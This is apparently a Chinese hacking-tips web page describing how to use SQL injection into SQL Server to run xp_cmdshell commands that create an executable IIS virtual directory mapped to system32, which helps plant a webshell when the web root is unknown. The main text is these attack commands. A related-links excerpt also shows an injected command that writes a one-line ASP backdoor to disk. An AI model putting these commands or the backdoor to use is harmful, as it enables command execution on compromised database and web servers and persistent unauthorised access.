SQL注入建立虚拟目录,找Web绝对路径!
我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虚拟目录win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
让win句有解析asp脚本权限
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
删除虚拟目录。
找不到web绝对路径的一种解决办法,
http://21o.net/h4x0r
403错误,表示虚拟目录建好了。。。
相关推荐
-
SQL注入建立虚拟目录,找Web绝对路径!
我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错: exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"' 建立虚拟目录win,指向c:\winnt\system32 exe
-
sql注入建立虚拟目录
sql注入建立虚拟目录,免得找web绝对路径---------------------------------------------------------------- 我们很多情况下都遇到sql注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错: exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l&qu
-
sql server注入建立虚拟目录的方法
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"' 建立虚拟目录win,指向c:\winnt\system32 exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.
-
CMD下建立虚拟目录的方法
以下是丑要饭的<web数据分离> web 和 数据分离,有Pcanywhere,数据库服务器有 IIS, cscript.exe c:\inetpub\adminscripts\adsutil.vbs get w3svc/1/serverbindings 得到第一个Web服务的端口 cscript.exe c:\inetpub\adminscripts\adsutil.vbs create w3svc/1/root/wodexi/ IisWebVirtualDir创建一个虚拟目录wode
-
最详细的SQL注入相关的命令整理 (转)第1/2页
1. 用^转义字符来写ASP(一句话木马)文件的方法: ? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';-- ? echo ^<%execute^(reques
-
用C语言winform编写渗透测试工具实现SQL注入功能
目录 用C语言winform编写渗透测试工具使SQL注入 一.SQL注入 二.实现步骤 三.代码实现 四.软件使用步骤 用C语言winform编写渗透测试工具使SQL注入 一.SQL注入 原理: SQL注入是指攻击者在Web应用程序中事先定义好的查询语句的结尾加上额外的SQL语句,这些一般都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作.(危害:盗取网站敏感信息.绕过验证登录网站后台.借助数据库的存储过程进行权限提升等操作).造成的原因是程序员在编写Web程序时,没有对浏览
-
一篇文章了解SQL注入漏洞
目录 SQL注入漏洞原理 SQL注入内容 注入条件 SQL注释符与注入流程 SQL注入分类 SQLMap 分类 接受请求类型区分 注入数据类型的区分 SQL注入思路 手工注入思路 SQL 详细注入过程 总结 SQL注入漏洞原理 漏洞原理 web页面源代码对用户提交的参数没有做出任何过滤限制,直接扔到SQL语句中去执行,导致特殊字符改变了SQL语句原来的功能和逻辑.黑客利用此漏洞执行恶意的SQL语句,如查询数据.下载数据,写webshell.执行系统命令以此来绕过登录权限限制等. 检测方法
-
PHP编程之设置apache虚拟目录
apache虚拟目录设置方法分享,供大家参考,具体内容如下 1.开启"虚拟目录配置文件"httpd-vhosts.conf 文件路径:\wamp\bin\apache\apache2.4.9\conf\extra\httpd-vhosts.conf 将以下配置: # Virtual hosts # Include conf/extra/httpd-vhosts.conf 改为: # Virtual hosts Include conf/extra/httpd-vhosts.co
-
C#创建IIS虚拟目录的方法
本文实例讲述了C#创建IIS虚拟目录的方法.分享给大家供大家参考.具体分析如下: DirectoryEntry是.Net给我们的一大礼物,他的名字我们就知道他的功能--目录入口.使用过ADSI的人都知道操作IIS,WinNT这些时,我们还需要提供他们的Path,操作IIS时,这个Path的格式为: 复制代码 代码如下: IIS://ComputerName/Service/Website/Directory ComputerName:即操作的服务器的名字,可以是名字也可以是IP,经常用的就是lo
-
数据库之SQL注入原理以及过程的简单介绍
1.产生SQL注入原因 开发代码的时候没有全面考虑到网络安全性,特别是在用户交互时,没有考虑到用户提交的信息中可能破坏数据库,没有对输入的数据进行合法的过滤.SQL 注入过程目的性是非常强的,其主要目标是 Web 应用的后台数据库,从数据库中获取信息和授予较高的权限,它先破坏数据库,再对数据库服务器进行破坏. 2.SQL注入原理 首先要了解web网站的架构: Web 网站架构,总体结构由 Web 服务器端.客户终端和通信协议三大部分组成. 表示层是指用户交互的界面.用户在使用时在表示层输入需求,
随机推荐
- 用正则实现提取代码内容的代码
- JavaScript 继承详解(三)
- git工作区和暂存区_动力节点Java学院整理
- iOS使用UIScorllView实现两指缩放功能
- javascript实现类似百度分享功能的方法
- 详解PHP的Laravel框架中Eloquent对象关系映射使用
- Laravel+jQuery实现AJAX分页效果
- PHP面向对象中new self()与 new static()的区别浅析
- PHP学习之PHP变量
- CI框架Session.php源码分析
- python下实现二叉堆以及堆排序的示例
- 微信 用脚本查看是否被微信好友删除
- C语言中正切的相关函数总结
- C#中实现在32位、64位系统下自动切换不同的SQLite dll文件
- javascript中的一些注意事项 更新中
- python多线程编程方式分析示例详解
- 批量文件自动搜索替换插入器 Ver2.1
- 将表里的数据批量生成INSERT语句的存储过程 增强版
- ORACLE 超长字符串问题的解决办法
- php中目录,文件操作详谈